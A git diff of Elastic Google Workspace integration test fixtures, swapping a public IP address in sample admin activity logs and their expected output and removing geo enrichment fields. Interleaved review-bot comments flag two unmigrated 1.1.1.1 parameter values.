-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"EMAIL_SETTINGS","name":"CHANGE_GMAIL_SETTING","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_DESCRIPTION","value":"setting description"},{"name":"SETTING_NAME","value":"setting"},{"name":"USER_DEFINED_SETTING_NAME","value":"setting name"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"EMAIL_SETTINGS","name":"CREATE_GMAIL_SETTING","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_DESCRIPTION","value":"setting description"},{"name":"SETTING_NAME","value":"setting"},{"name":"USER_DEFINED_SETTING_NAME","value":"setting name"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"EMAIL_SETTINGS","name":"DELETE_GMAIL_SETTING","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_DESCRIPTION","value":"setting description"},{"name":"SETTING_NAME","value":"setting"},{"name":"USER_DEFINED_SETTING_NAME","value":"setting name"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"EMAIL_SETTINGS","name":"REJECT_FROM_QUARANTINE","parameters":[{"name":"EMAIL_LOG_SEARCH_MSG_ID","value":"id"},{"name":"QUARANTINE_NAME","value":"quarantine"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"EMAIL_SETTINGS","name":"RELEASE_FROM_QUARANTINE","parameters":[{"name":"EMAIL_LOG_SEARCH_MSG_ID","value":"id"},{"name":"QUARANTINE_NAME","value":"quarantine"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"EMAIL_SETTINGS","name":"DROP_FROM_QUARANTINE","parameters":[{"name":"EMAIL_LOG_SEARCH_MSG_ID","value":"id"},{"name":"QUARANTINE_NAME","value":"quarantine"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"EMAIL_SETTINGS","name":"EMAIL_LOG_SEARCH","parameters":[{"name":"EMAIL_LOG_SEARCH_END_DATE","value":"2020/07/28 04:59:59 UTC"},{"name":"EMAIL_LOG_SEARCH_MSG_ID","value":"id"},{"name":"EMAIL_LOG_SEARCH_RECIPIENT","value":"recipient"},{"name":"EMAIL_LOG_SEARCH_SENDER","value":"sender"},{"name":"EMAIL_LOG_SEARCH_SMTP_RECIPIENT_IP","value":"1.1.1.1"},{"name":"EMAIL_LOG_SEARCH_SMTP_SENDER_IP","value":"1.1.1.1"},{"name":"EMAIL_LOG_SEARCH_START_DATE","value":"2002-10-02T10:00:00Z"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"EMAIL_SETTINGS","name":"EMAIL_UNDELETE","parameters":[{"name":"END_DATE","value":"2002-10-02T12:00:00Z"},{"name":"USER_EMAIL","value":"user@example.com"},{"name":"START_DATE","value":"2002-10-02T10:00:00Z"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"EMAIL_SETTINGS","name":"CHANGE_EMAIL_SETTING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"EMAIL_SETTINGS","name":"CHANGE_GMAIL_SETTING","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_DESCRIPTION","value":"setting description"},{"name":"SETTING_NAME","value":"setting"},{"name":"USER_DEFINED_SETTING_NAME","value":"setting name"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"EMAIL_SETTINGS","name":"CREATE_GMAIL_SETTING","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_DESCRIPTION","value":"setting description"},{"name":"SETTING_NAME","value":"setting"},{"name":"USER_DEFINED_SETTING_NAME","value":"setting name"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"EMAIL_SETTINGS","name":"DELETE_GMAIL_SETTING","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_DESCRIPTION","value":"setting description"},{"name":"SETTING_NAME","value":"setting"},{"name":"USER_DEFINED_SETTING_NAME","value":"setting name"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"EMAIL_SETTINGS","name":"REJECT_FROM_QUARANTINE","parameters":[{"name":"EMAIL_LOG_SEARCH_MSG_ID","value":"id"},{"name":"QUARANTINE_NAME","value":"quarantine"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"EMAIL_SETTINGS","name":"RELEASE_FROM_QUARANTINE","parameters":[{"name":"EMAIL_LOG_SEARCH_MSG_ID","value":"id"},{"name":"QUARANTINE_NAME","value":"quarantine"}]}}
diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-gmail.log-expected.json b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-gmail.log-expected.json
index baf5083268a..338470c38ea 100644
--- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-gmail.log-expected.json
+++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-gmail.log-expected.json
@@ -10,7 +10,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": {
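Review bot: The new-side EMAIL_LOG_SEARCH record still carries `1.1.1.1` in both `EMAIL_LOG_SEARCH_SMTP_RECIPIENT_IP` and `EMAIL_LOG_SEARCH_SMTP_SENDER_IP` while `ipAddress` on the same line was moved to 67.43.156.13. If the aim is to keep every public address in the fixtures inside the supported test subset, these two values should be updated as well, e.g. `{"name":"EMAIL_LOG_SEARCH_SMTP_RECIPIENT_IP","value":"67.43.156.13"}` and the matching sender entry, and the EMAIL_LOG_SEARCH entry in test-admin-gmail.log-expected.json regenerated with them. Whether the pipeline enriches those parameter values is not visible in this diff; if it does not, the point is only one of fixture consistency.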
@@ -36,35 +36,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:22.770431600Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"DROP_FROM_QUARANTINE\",\"parameters\":[{\"name\":\"EMAIL_LOG_SEARCH_MSG_ID\",\"value\":\"id\"},{\"name\":\"QUARANTINE_NAME\",\"value\":\"quarantine\"}]}}", + "ingested": "2021-12-09T13:38:42.563962500Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"DROP_FROM_QUARANTINE\",\"parameters\":[{\"name\":\"EMAIL_LOG_SEARCH_MSG_ID\",\"value\":\"id\"},{\"name\":\"QUARANTINE_NAME\",\"value\":\"quarantine\"}]}}", "provider": "admin", "action": "DROP_FROM_QUARANTINE", "id": "1", @@ -94,7 +76,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -120,35 +102,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:22.770438600Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"EMAIL_LOG_SEARCH\",\"parameters\":[{\"name\":\"EMAIL_LOG_SEARCH_END_DATE\",\"value\":\"2020/07/28 04:59:59 UTC\"},{\"name\":\"EMAIL_LOG_SEARCH_MSG_ID\",\"value\":\"id\"},{\"name\":\"EMAIL_LOG_SEARCH_RECIPIENT\",\"value\":\"recipient\"},{\"name\":\"EMAIL_LOG_SEARCH_SENDER\",\"value\":\"sender\"},{\"name\":\"EMAIL_LOG_SEARCH_SMTP_RECIPIENT_IP\",\"value\":\"1.1.1.1\"},{\"name\":\"EMAIL_LOG_SEARCH_SMTP_SENDER_IP\",\"value\":\"1.1.1.1\"},{\"name\":\"EMAIL_LOG_SEARCH_START_DATE\",\"value\":\"2002-10-02T10:00:00Z\"}]}}", + "ingested": "2021-12-09T13:38:42.563970900Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"EMAIL_LOG_SEARCH\",\"parameters\":[{\"name\":\"EMAIL_LOG_SEARCH_END_DATE\",\"value\":\"2020/07/28 
04:59:59 UTC\"},{\"name\":\"EMAIL_LOG_SEARCH_MSG_ID\",\"value\":\"id\"},{\"name\":\"EMAIL_LOG_SEARCH_RECIPIENT\",\"value\":\"recipient\"},{\"name\":\"EMAIL_LOG_SEARCH_SENDER\",\"value\":\"sender\"},{\"name\":\"EMAIL_LOG_SEARCH_SMTP_RECIPIENT_IP\",\"value\":\"1.1.1.1\"},{\"name\":\"EMAIL_LOG_SEARCH_SMTP_SENDER_IP\",\"value\":\"1.1.1.1\"},{\"name\":\"EMAIL_LOG_SEARCH_START_DATE\",\"value\":\"2002-10-02T10:00:00Z\"}]}}", "provider": "admin", "action": "EMAIL_LOG_SEARCH", "id": "1", @@ -178,7 +142,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
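Review bot: The `EMAIL_LOG_SEARCH_SMTP_RECIPIENT_IP` and `EMAIL_LOG_SEARCH_SMTP_SENDER_IP` parameters in this event's `event.original` still carry `1.1.1.1`, a real public address outside the subset the rest of the commit migrates to, so the fixture only half-follows the "change test public IPs to the supported subset" intent. Elsewhere in the same PR (the 1password fixture in this diff's header) `1.1.1.1` was replaced with `89.160.20.156`; applying the same substitution here — in the `.log` input and in this expected `original` string — keeps the test corpus consistent and avoids any enrichment step resolving a live address. If the pipeline never extracts those parameter values into an `ip`-typed field, the change is cosmetic but still worth making for consistency.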
@@ -198,35 +162,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:22.770441300Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"EMAIL_UNDELETE\",\"parameters\":[{\"name\":\"END_DATE\",\"value\":\"2002-10-02T12:00:00Z\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"START_DATE\",\"value\":\"2002-10-02T10:00:00Z\"}]}}", + "ingested": "2021-12-09T13:38:42.563976300Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"EMAIL_UNDELETE\",\"parameters\":[{\"name\":\"END_DATE\",\"value\":\"2002-10-02T12:00:00Z\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"START_DATE\",\"value\":\"2002-10-02T10:00:00Z\"}]}}", "provider": "admin", "action": "EMAIL_UNDELETE", "end": "2002-10-02T12:00:00.000Z", @@ -257,7 +203,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -281,35 +227,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:22.770443900Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"CHANGE_EMAIL_SETTING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", + "ingested": "2021-12-09T13:38:42.563981600Z", + "original": 
"{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"CHANGE_EMAIL_SETTING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "provider": "admin", "action": "CHANGE_EMAIL_SETTING", "id": "1", @@ -340,7 +268,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -364,35 +292,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:22.770445900Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"CHANGE_GMAIL_SETTING\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_DESCRIPTION\",\"value\":\"setting description\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"},{\"name\":\"USER_DEFINED_SETTING_NAME\",\"value\":\"setting name\"}]}}", + "ingested": "2021-12-09T13:38:42.563987Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"CHANGE_GMAIL_SETTING\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_DESCRIPTION\",\"value\":\"setting description\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"},{\"name\":\"USER_DEFINED_SETTING_NAME\",\"value\":\"setting name\"}]}}", "provider": "admin", "action": "CHANGE_GMAIL_SETTING", "id": "1", 
@@ -423,7 +333,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -447,35 +357,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:22.770447800Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"CREATE_GMAIL_SETTING\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_DESCRIPTION\",\"value\":\"setting description\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"},{\"name\":\"USER_DEFINED_SETTING_NAME\",\"value\":\"setting name\"}]}}", + "ingested": "2021-12-09T13:38:42.563991Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"CREATE_GMAIL_SETTING\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_DESCRIPTION\",\"value\":\"setting description\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"},{\"name\":\"USER_DEFINED_SETTING_NAME\",\"value\":\"setting name\"}]}}", "provider": "admin", "action": "CREATE_GMAIL_SETTING", "id": "1", 
@@ -506,7 +398,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -530,35 +422,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:22.770450300Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"DELETE_GMAIL_SETTING\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_DESCRIPTION\",\"value\":\"setting description\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"},{\"name\":\"USER_DEFINED_SETTING_NAME\",\"value\":\"setting name\"}]}}", + "ingested": "2021-12-09T13:38:42.563995300Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"DELETE_GMAIL_SETTING\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_DESCRIPTION\",\"value\":\"setting description\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"},{\"name\":\"USER_DEFINED_SETTING_NAME\",\"value\":\"setting name\"}]}}", "provider": "admin", "action": "DELETE_GMAIL_SETTING", "id": "1", 
@@ -589,7 +463,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -615,35 +489,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:22.770453400Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"REJECT_FROM_QUARANTINE\",\"parameters\":[{\"name\":\"EMAIL_LOG_SEARCH_MSG_ID\",\"value\":\"id\"},{\"name\":\"QUARANTINE_NAME\",\"value\":\"quarantine\"}]}}", + "ingested": "2021-12-09T13:38:42.564000600Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"REJECT_FROM_QUARANTINE\",\"parameters\":[{\"name\":\"EMAIL_LOG_SEARCH_MSG_ID\",\"value\":\"id\"},{\"name\":\"QUARANTINE_NAME\",\"value\":\"quarantine\"}]}}", "provider": "admin", "action": "REJECT_FROM_QUARANTINE", "id": "1", @@ -673,7 +529,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -699,35 +555,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:22.770455600Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"RELEASE_FROM_QUARANTINE\",\"parameters\":[{\"name\":\"EMAIL_LOG_SEARCH_MSG_ID\",\"value\":\"id\"},{\"name\":\"QUARANTINE_NAME\",\"value\":\"quarantine\"}]}}", + "ingested": 